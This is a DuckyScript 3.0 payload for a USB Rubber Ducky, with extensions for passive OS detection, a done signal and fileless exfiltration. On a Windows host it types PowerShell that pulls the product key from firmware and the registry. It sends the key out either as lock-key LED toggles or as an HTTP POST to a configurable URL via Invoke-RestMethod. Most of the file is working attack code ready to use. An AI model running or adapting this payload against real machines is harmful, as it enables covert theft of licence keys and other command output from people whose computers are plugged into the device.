REM WindowsLicenseKeyExfiltration
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM This small PowerShell payload dumps the Windows product key, which may be stored in the firmware (OA3) and/or in the registry, and exfiltrates it either through Keystroke Reflection (lock-key LEDs; no file, no network) or, when #REMOTE_EXFIL is TRUE, as an HTTP POST to #URL.
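REM Extension made by Korben for checking if Target is Windows OS
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.

USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or #NOT_WINDOWS (7)
See end of payload for usage within payload

HOW IT WORKS:
Nothing is typed on the target. The extension waits (up to #MAX_WAIT polls of
#CHECK_INTERVAL ms each) for the host to answer the Ducky's lock-key LED report,
then looks at how many USB configuration requests the host issued during
enumeration. A count above #WINDOWS_HOST_REQUEST_COUNT is classified as Windows.
This is a heuristic, not a proof: a host that answers the LED report late, or an
unusual USB stack, can be misclassified, so whatever the payload does in its
NOT_WINDOWS branch should be harmless if it runs on the wrong OS.
END_REM

REM CONFIGURATION:
REM Maximum number of polls before giving up on the host's LED reply (150 * 20 ms = 3 s).
DEFINE #MAX_WAIT 150
REM Milliseconds between polls.
DEFINE #CHECK_INTERVAL 20
REM Hosts that issued more configuration requests than this are classified as Windows.
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
REM Sentinel stored in $_OS when the host is not classified as Windows.
DEFINE #NOT_WINDOWS 7

REM Default to NOT_WINDOWS so a timeout never leaves $_OS unset.
$_OS = #NOT_WINDOWS

REM Dynamic boot delay: poll until the host replies to the lock-key LED report or the budget is spent.
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
    DELAY #CHECK_INTERVAL
    $MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE

REM NOTE(review): the classification below also runs when the loop timed out (host never answered); the request count is then whatever was observed so far.
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
    $_OS = WINDOWS
END_IF

REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
    STRING HELLO WINDOWS!
ELSE
    STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION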
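REM Extension made by 0iphor13 to signal the end of the payload
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13

REM_BLOCK DOCUMENTATION
USAGE:
Call Detect_Finished() as the last step of your payload. It presses CAPSLOCK a few
times with #PAUSE ms in between (a visible "done" blink on the target keyboard's
LED) and then switches the Ducky to ATTACKMODE OFF.

Call it only after any Keystroke Reflection transfer has completed and
RESTORE_HOST_KEYBOARD_LOCK_STATE has run: the function presses CAPSLOCK itself,
and ATTACKMODE OFF ends the HID session, so nothing can be typed afterwards.
END_REM

REM CONFIGURATION:
REM Milliseconds between Caps Lock presses; controls how visible the blink is.
DEFINE #PAUSE 150

FUNCTION Detect_Finished()
    IF ($_CAPSLOCK_ON == FALSE) THEN
        REM Caps Lock is off: four presses give two visible blinks and leave it off again.
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
    ELSE
        REM Caps Lock is on: three presses (off, on, off).
        REM NOTE(review): this is an odd number of toggles, so the target is left with Caps Lock OFF instead of its original ON state; confirm that is intended, otherwise add a fourth CAPSLOCK press.
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
        DELAY #PAUSE
        CAPSLOCK
    END_IF
    REM Both branches end here: drop the HID interface once the signal has been sent.
    ATTACKMODE OFF
END_FUNCTION
END_EXTENSION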
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13

REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB-HID-only data exfiltration and is based on Hak5's original Keystroke Reflection method.

TARGET:
Windows hosts that support PowerShell and SendKeys (System.Windows.Forms).

USAGE:
Type out your command or script in PowerShell with STRING (not STRINGLN) so it is still pending on the prompt, then call Windows_Fileless_HID_Exfil() right after it.
The function appends a pipeline to that line, stores the command's/script's output in a variable, and sends it back to the Ducky as lock-key toggles.

HOW THE DATA IS ENCODED:
Each character of the output is sent as 8 lock-key presses, most significant bit first: NUMLOCK for a 1 bit, CAPSLOCK for a 0 bit. Only the low 8 bits of each character are tested (masks 0x80..0x01), so anything above 0xFF is truncated. A final SCROLLLOCK press marks the end of the transfer.
$_EXFIL_MODE_ENABLED / $_EXFIL_LEDS_ENABLED switch the Ducky into DuckyScript's Keystroke Reflection receive mode for the duration of the transfer.

CAVEATS:
- WAIT_FOR_SCROLL_CHANGE has no timeout: if the typed PowerShell never reaches SendWait (mistyped line, Add-Type blocked, console lost focus) the payload hangs there and nothing after the call runs.
- The whole pipeline is typed into, and visible in, the target's console.
- $_EXFIL_LEDS_ENABLED is turned on here and not turned back off.

Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM

FUNCTION Windows_Fileless_HID_Exfil()
    DELAY 250
    REM Remember the host's current lock-key state so it can be restored after the transfer.
    SAVE_HOST_KEYBOARD_LOCK_STATE
    REM Enter exfil mode before anything is typed, so every lock-key change from here on is captured as data (LEDs mirror the bits).
    $_EXFIL_MODE_ENABLED = TRUE
    $_EXFIL_LEDS_ENABLED = TRUE
    DELAY 500
    REM Append to the caller's pending command: capture its output as text in $DD.
    STRING |Out-String|Set-Variable -Name "DD";
    REM Encode $DD bit by bit into SendKeys tokens (% is the SendKeys Alt modifier) and append the SCROLLLOCK terminator.
    STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
    REM Run the whole line: load WinForms, replay the lock-key sequence synchronously, then close the console.
    STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
    REM Block until the terminating SCROLLLOCK arrives. No timeout (see CAVEATS).
    WAIT_FOR_SCROLL_CHANGE
    LED_G
    $_EXFIL_MODE_ENABLED = FALSE
    REM Put the host's lock keys back the way they were before the transfer.
    RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION
REM If set to TRUE, keys will be sent via PowerShell's Invoke-RestMethod instead of Keystroke Reflection
DEFINE #REMOTE_EXFIL FALSE
REM Define the remote host to which the keys shall be sent. (Only when REMOTE_EXFIL is set to TRUE!)
REM NOTE: #URL is substituted verbatim into the typed Invoke-RestMethod line. Use an https:// endpoint you control: the product key is POSTed as the plain request body with no authentication or encryption of its own, so an http:// URL or a typo sends it in the clear / to the wrong place.
DEFINE #URL https://example.com/

REM If Target is Windows, execute payload
IF ($_OS == WINDOWS) THEN
    REM Open a PowerShell console via the Run dialog (no profile, non-interactive).
    GUI r
    DELAY 500
    STRINGLN powershell -nop -noni
    REM NOTE(review): fixed 1 s wait for the console to appear; on a slow host the following keystrokes can be lost. Increase if the payload misfires.
    DELAY 1000
    REM Console banner only; it is a separate command, so it is not part of the output captured below.
    STRINGLN Write-Host "[+]Attempting exfiltration of Windows Product Keys..." -ForegroundColor Green
    DELAY 300
    REM Build the collection command as a string (single line; the exfil step appends its own pipeline to it).
    REM Dumping License key when saved in Bios: the OA3 key exposed through the SoftwareLicensingService WMI class.
    REM NOTE(review): Get-WmiObject exists in Windows PowerShell (what `powershell` launches) but presumably not in PowerShell 7+; Get-CimInstance would be the portable form.
    STRING $Get_License = "echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey;
    REM Dumping License key via registry (BackupProductKeyDefault under SoftwareProtectionPlatform)
    STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault"
    REM Executing Get_License. Deliberately no newline: whichever branch below continues this line with "|Out-String|...".
    STRING ;IeX $Get_License

    REM If REMOTE_EXFIL is set to TRUE, exfiltrate keys to remote host
    IF_DEFINED_TRUE #REMOTE_EXFIL
        DELAY 500
        REM Capture the output into $DD, POST it to #URL, then close the console.
        REM NOTE(review): a failed request (no network, TLS error, wrong #URL) is not detected here; Detect_Finished() signals "done" regardless.
        STRINGLN |Out-String|Set-Variable -Name "DD";Invoke-Restmethod -UseBasicParsing -Method Post -Uri "#URL" -Body $DD;exit
        DELAY 150
        Detect_Finished()
    ELSE_DEFINED
        REM Exfiltrating License key via Keystroke Reflection (no file, no network; see WINDOWS_FILELESS_HID_EXFIL)
        Windows_Fileless_HID_Exfil()
        DELAY 150
        Detect_Finished()
    END_IF_DEFINED
REM If System is not Windows...
ELSE
    REM NOTE(review): this presents the Ducky as mass storage to a non-Windows host, which typically exposes whatever is on the Ducky's storage (payload files, and with them #URL) to that host. Use ATTACKMODE OFF instead if that is not wanted.
    ATTACKMODE STORAGE
END_IF